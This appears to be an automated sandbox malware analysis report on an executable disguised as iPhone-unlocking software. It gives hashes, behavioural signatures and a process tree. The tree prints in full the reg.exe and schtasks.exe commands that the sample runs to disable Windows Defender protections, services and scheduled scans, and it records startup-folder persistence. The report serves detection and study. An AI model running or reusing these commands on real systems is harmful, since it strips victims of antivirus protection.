Analysis
max time kernel: 151s
max time network: 85s
platform: windows10-2004_x64
resource: win10v2004-20221111-en
resource tags: arch:x64, arch:x86, image:win10v2004-20221111-en, locale:en-us, os:windows10-2004-x64, system
submitted: 16-01-2023 21:46
Static task
static1
Behavioral task
behavioral1
Sample
F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe
Resource
win7-20221111-en
General
Target: F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe
Size: 16.0MB
MD5: 0f007d899ab6ef50e71a1acfd1ab4147
SHA1: 6cbb099844201db58f34f41720b001f6e10d6197
SHA256: f816ea850eca0a23b99541054eddc2ac01971bb502dcf1231dc02ed58282365f
SHA512: a49c5898e060c0bf5e35608740c2317283e6f13d6f70bc62b1648689e7ba19e83d3c8b179aa1f37b0a57469edc75e30b1d0f93b4b065f361627a6e64065bc91c
SSDEEP: 393216:T3HBq+lXKkz4XNC6JMxBEMYUUwE+hxRgNqw+VNdT0Qxq+I:jVdxwNC6JgBEIzD/gkfVPZVI
Malware Config
Signatures
description | ioc | Process
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | reg.exe
Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | reg.exe
Modifies security service 2 TTPs 1 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | reg.exe
Executes dropped EXE 5 IoCs
pid | Process
1900 | PassFabiPhone.exe
2216 | NanWin.exe
4580 | ParaWin.exe
4628 | iphone-unlocker.exe
1648 | iphone-unlocker.tmp
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation | F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe
Drops startup file 3 IoCs
description | ioc | Process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MicWinEdge.exe | ParaWin.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MicWinEdge.exe | ParaWin.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MicWinEdge.exe | NanWin.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid | Process
4580 | ParaWin.exe
4580 | ParaWin.exe
4580 | ParaWin.exe
4580 | ParaWin.exe
4580 | ParaWin.exe
4580 | ParaWin.exe
4580 | ParaWin.exe
4580 | ParaWin.exe
4580 | ParaWin.exe
2216 | NanWin.exe
2216 | NanWin.exe
2216 | NanWin.exe
2216 | NanWin.exe
2216 | NanWin.exe
2216 | NanWin.exe
2216 | NanWin.exe
2216 | NanWin.exe
2216 | NanWin.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs
description | pid | Process
Token: SeDebugPrivilege | 4580 | ParaWin.exe
Token: SeDebugPrivilege | 2216 | NanWin.exe
Suspicious use of SetWindowsHookEx 3 IoCs
pid | Process
1900 | PassFabiPhone.exe
4628 | iphone-unlocker.exe
1648 | iphone-unlocker.tmp
Suspicious use of WriteProcessMemory 64 IoCs
Processes
C:\Users\Admin\AppData\Local\Temp\F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\F816EA850ECA0A23B99541054EDDC2AC01971BB502DCF.exe"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:4308
    C:\Users\Admin\AppData\Roaming\PassFabiPhone.exe
      Command line: "C:\Users\Admin\AppData\Roaming\PassFabiPhone.exe"
      - Executes dropped EXE
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory
      PID:1900
        C:\Windows\system32\cmd.exe
          Command line: "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6D84.tmp\6D85.tmp\6D86.bat C:\Users\Admin\AppData\Roaming\PassFabiPhone.exe"
          - Suspicious use of WriteProcessMemory
          PID:4568
            C:\Windows\system32\reg.exe
              Command line: reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
              PID:1636
            C:\Windows\system32\reg.exe
              Command line: reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
              PID:2008
            C:\Windows\system32\reg.exe
              Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
              PID:1524
            C:\Windows\system32\reg.exe
              Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
              PID:2200
            C:\Windows\system32\reg.exe
              Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
              PID:4264
            C:\Windows\system32\reg.exe
              Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
              - Modifies Windows Defender Real-time Protection settings
              PID:3172
            C:\Windows\system32\reg.exe
              Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
              - Modifies Windows Defender Real-time Protection settings
              PID:3436
            C:\Windows\system32\reg.exe
              Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
              - Modifies Windows Defender Real-time Protection settings
              PID:628
            C:\Windows\system32\reg.exe
              Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
              - Modifies Windows Defender Real-time Protection settings
              PID:2420
            C:\Windows\system32\reg.exe
              Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
              - Modifies Windows Defender Real-time Protection settings
              PID:3884
            C:\Windows\system32\reg.exe
              Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
              PID:1824
            C:\Windows\system32\reg.exe
              Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
              PID:3024
            C:\Windows\system32\reg.exe
              Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
              PID:2972
            C:\Windows\system32\reg.exe
              Command line: reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
              PID:3680
            C:\Windows\system32\reg.exe
              Command line: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
              PID:3324
            C:\Windows\system32\reg.exe
              Command line: reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
              PID:4468
            C:\Windows\system32\schtasks.exe
              Command line: schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
              PID:316
            C:\Windows\system32\schtasks.exe
              Command line: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
              PID:4284
            C:\Windows\system32\schtasks.exe
              Command line: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
              PID:3776
            C:\Windows\system32\schtasks.exe
              Command line: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
              PID:4396
            C:\Windows\system32\schtasks.exe
              Command line: schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
              PID:4204
            C:\Windows\system32\reg.exe
              Command line: reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
              PID:4152
            C:\Windows\system32\reg.exe
              Command line: reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
              PID:2620
            C:\Windows\system32\reg.exe
              Command line: reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
              PID:3220
            C:\Windows\system32\reg.exe
              Command line: reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
              PID:3304
            C:\Windows\system32\reg.exe
              Command line: reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
              PID:2012
            C:\Windows\system32\reg.exe
              Command line: reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
              PID:3432
            C:\Windows\system32\reg.exe
              Command line: reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
              PID:2768
            C:\Windows\system32\reg.exe
              Command line: reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
              PID:5024
            C:\Windows\system32\reg.exe
              Command line: reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
              PID:1048
            C:\Windows\system32\reg.exe
              Command line: reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
              - Modifies security service
              PID:1540
    C:\Users\Admin\AppData\Roaming\NanWin.exe
      Command line: "C:\Users\Admin\AppData\Roaming\NanWin.exe"
      - Executes dropped EXE
      - Drops startup file
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID:2216
    C:\Users\Admin\AppData\Roaming\ParaWin.exe
      Command line: "C:\Users\Admin\AppData\Roaming\ParaWin.exe"
      - Executes dropped EXE
      - Drops startup file
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID:4580
    C:\Users\Admin\AppData\Roaming\iphone-unlocker.exe
      Command line: "C:\Users\Admin\AppData\Roaming\iphone-unlocker.exe"
      - Executes dropped EXE
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory
      PID:4628
        C:\Users\Admin\AppData\Local\Temp\is-394OL.tmp\iphone-unlocker.tmp
          Command line: "C:\Users\Admin\AppData\Local\Temp\is-394OL.tmp\iphone-unlocker.tmp" /SL5="$E004A,15327349,546304,C:\Users\Admin\AppData\Roaming\iphone-unlocker.exe"
          - Executes dropped EXE
          - Suspicious use of SetWindowsHookEx
          PID:1648
Network
MITRE ATT&CK Enterprise v6
Downloads